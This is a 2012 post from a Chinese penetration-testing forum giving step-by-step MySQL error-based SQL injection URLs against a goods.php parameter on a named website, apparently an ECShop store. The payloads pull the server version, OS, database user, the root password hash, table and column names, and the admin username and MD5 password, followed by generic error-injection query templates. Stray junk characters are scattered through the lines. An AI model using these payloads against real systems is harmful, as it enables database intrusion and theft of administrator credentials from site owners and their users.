找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2065|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号
% ^1 S) ^. m! p6 f# x" qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 [2 S6 N$ z' k) \
/ y# B7 n  X# t; D" f1 B判断系统: S: ^1 d! ]% v

3 [6 b9 x9 J0 R& I; nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- w$ X& s" R) b0 I/ \3 i1 m  m
% B+ }. h: x) b, c" e0 c
5 w0 u; ^* V, m' ]. A+ t' J& J5 ^$ T/ y% F
当前 user()3 }3 x) s# c. n

& L; O$ |3 i0 i% e4 dhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
- q9 F0 G5 }2 q$ @7 V* |3 {3 b: P; A$ A4 l& v7 i

, R; h4 w  e% [7 W/ B
% o# Z& `8 s( G! O. O- i: L当前 database()
  q0 B, [3 ]8 F- Yhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 f' b1 z" [! X' R- D0 K- M% p+ D1 h7 h" d0 v' Y7 x
8 @4 i- I6 i/ j& W0 l
2 r$ p; _) n4 }0 q8 q* U
) l8 D+ w) T2 l% f5 ~' K( `
root hash% `# J" Z/ o# Z: l2 \) U
8 R2 i& P/ u: t( a
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%234 u8 E# J4 f/ L, p. ?* b$ F( S
4 Y* R# P; K: W2 O: F1 q7 n/ U

5 X3 C3 L- \# H7 t) J8 Z/ f" t# ?- _5 R& O4 _) e9 X- ]
当前 数据库表名
; k2 L6 h, `/ ?( D2 N( D$ H, Y! s4 e/ {* z; }' e0 O" h( I
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% F( ]- O2 i' g/ @
% K2 y; a- D3 f  }( d9 ?7 A* U$ E, n0 `( F
! m" q4 C- G& k% ?0 v5 H" R
当前 数据库 user_name 字段
; q- O& G& S% ?
9 g* w7 l5 a: U& Khttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
) {1 f* U' ]9 j  i
6 z3 p6 u9 r: z3 U1 @当前 数据库 字段 password+ d9 }$ I# d8 A% {/ d5 z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23; u2 K0 P7 d3 i# Y* [- I2 s, k

( E" v1 D" x5 A' \/ j- q
1 o- l, U' l0 b' i+ v( O. p5 y; t, |# J0 D; x8 `- _. e0 s% i
获得 admin passwd(md5)1 F8 F9 p3 X9 v: p2 F3 z

" z4 w7 |; t! X$ C$ m/ x2 j: k4 N; G! b
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 w7 C0 q. Z7 Y+ `8 S# p5 R
( _2 [/ K) `$ M, F& t
报错注射4 Y* L% L5 \5 Y$ k
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)8 z7 F  O( }4 n7 u( S  _$ z

/ J% s* S. b; Q1 JSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
# g8 x3 n* H. x7 J4 ^7 h  W' n: R' u2 w
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表